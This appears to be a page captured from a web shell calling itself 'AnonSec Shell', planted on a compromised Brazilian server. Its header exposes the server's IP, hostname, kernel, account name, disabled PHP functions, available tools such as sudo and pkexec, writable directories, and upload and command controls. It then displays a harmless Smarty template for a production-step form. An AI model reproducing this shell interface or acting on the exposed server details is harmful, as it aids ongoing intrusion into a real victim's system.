AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.216.192
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/www/lrsys_apps/meridional/application/plugins/module_pcp/views/p-steps/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/www/lrsys_apps/meridional/application/plugins/module_pcp/views/p-steps/add.tpl
 <div class="wrapper wrapper-content">
    <div class="row">
        <div class="col-lg-12">
            <div class="ibox float-e-margins">
                <div class="ibox-title">
                    <h5>
                        {$_L['Pcp_steps menu_title']}
                        {if isset($product)}
                        | {$product['description']}
                        {/if}
                    </h5>
                    <div class="ibox-tools">
                           <a href="{$url['list']}" class="btn btn-primary btn-xs">{$_L['Pcp_steps list_title']}</a>
                    </div>
                </div>
                <div class="ibox-content" id="ibox_form">

                  {if isset($steps['id'])}
                    <form class="form-horizontal" action="{$url['edit']}/{$steps['id']}" id="eform" method="POST">
                  {else}
                    <form class="form-horizontal" action="{$url['add']}" id="eform" method="POST">
                  {/if}

                            <div id="general_data" class="tab-pane fade in active">
                                <div class="row" style="margin-top:20px">

                                    <div class="col-md-4 col-sm-6 col-xs-12" style="display: none;">

                                    {if isset($steps['product_id'])}
                                      <input type="hidden" id="selected-product" name="id_product" value="{$steps['product_id']}">
                                    {/if}
                                      <label class="control-label" for="products">{$_L['Product']}</label>
                                      <select class="form-control select2 products" name="product_id" style="width:100%"></select>
                                  </div>

                                  <div class="col-md-4 col-sm-6 col-xs-12">
                                      <label class="control-label" for="name">{$_L['Name']}{$_L['*']}
                                      </label>
                                      {if isset($steps['name'])}
                                        <input type="text" id="name" name="name" class="form-control" autocomplete="off" placeholder="" value="{$steps['name']}" required="">
                                        {else}
                                        <input type="text" id="name" name="name" class="form-control" autocomplete="off" placeholder="" value="" required="">
                                      {/if}
                                  </div>

                                  <div class="col-md-4 col-sm-6 col-xs-12">
                                      <label class="control-label" for="duration_time">{$_L['Pcp_steps duration_time']}{$_L['*']}
                                      </label>
                                      {if isset($steps['duration_time'])}
                                        <input type="text" id="duration_time" name="duration_time" class="form-control" autocomplete="off" placeholder="" value="{$steps['duration_time']}" required="">
                                      {else}
                                      <input type="text" id="duration_time" name="duration_time" class="form-control" autocomplete="off" placeholder="" value="" required="">

                                      {/if}
                                  </div>
                                  
                                  {*<div class="col-md-4 col-sm-6 col-xs-12">
                                      <label class="control-label" for="duration_time">Custo{$_L['*']}
                                      </label>
                                      {if isset($steps['duration_time'])}
                                        <input type="text" id="duration_time" name="duration_time" class="form-control" autocomplete="off" placeholder="" value="{$steps['duration_time']}" required="">
                                      {else}
                                      <input type="text" id="duration_time" name="duration_time" class="form-control" autocomplete="off" placeholder="" value="" required="">

                                      {/if}
                                  </div>*}


                                  <div class="col-md-12 col-sm-12 col-xs-12">

                                    {if isset($equipaments)}
                                      {foreach from=$equipaments item=equipament}
                                      	<input type="hidden" class="ids_equipament" value="{$equipament['id_equipament']}">
                                      {/foreach}
                                    {/if}
                                      <label class="control-label" for="equipaments">{$_L['Pcp_steps equipaments']}</label>
                                      <select class="form-control select2 equipaments" name="ids_equipaments[]" style="width:100%" multiple></select>
                                  </div>


                                </div>
                                <div class="clearfix"></div>
                            </div> <!-- Fim dados gerais -->




                        <div class="row" style="margin-top:20px">
                            <div class=" col-md-12 form-grouxp">
                                <div class="col-md-offset-2 col-lg-10">
                                    <button class="md-btn md-btn-primary waves-effect waves-light" type="submit" id="submit"><i class="fa fa-check"></i> {$_L['Save']}</button> | <a href="{$url['list']}">{$_L['Or Cancel']}</a>
                                </div>
                            </div>
                        </div>

                    </form>
                </div>
            </div>

        </div>

        <div class="col-lg-12">
          <div class="ibox float-e-margins">
                <div class="ibox-title">
                    <h5>
                    {$_L['Pcp product_info']}
                    </h5>
                    {* <div class="ibox-tools">
                           <a href="{$url['list']}" class="btn btn-primary btn-xs">{$_L['Pcp_steps list_title']}</a>
                    </div> *}
                </div>

                <div class="ibox-content" id="ibox_form">
                  <div class="row" style="margin-top:20px">

                  {if isset($steps['id'])}
                    <form class="form-horizontal" action="{$url['edit']}/{$steps['id']}" id="eform" method="POST">
                  {else}
                    <form class="form-horizontal" action="{$url['add']}" id="eform" method="POST">
                  {/if}
                        <div class="tab-content">


                            {if isset($list_steps)}

                              <table id="" class="table table-bordered table-hover ">
                                <thead>
                                  <tr>
                                    <th>Ordem</th>
                                    <th>Processo</th>
                                    <th>Duração</th>
                                  </tr>
                                </thead>
                                <tbody class="sortable">

                                  {foreach from=$list_steps item=item key=key}
                                  <div class="">
                                    <tr data-id="{$item['id']}">
                                      <th scope="row" class="step-order">{$item['order']}</th>
                                      <td>{$item['name']}</td>
                                      <td>{$item['duration_time']}</td>
                                    </tr>
                                  </div>
                                  {/foreach}

                                </tbody>
                            </table>

                           {/if}

                        </div>

                    </form>
                </div>
            </div>
        </div>

    </div>

</div>

Anon7 - 2022
AnonSec Team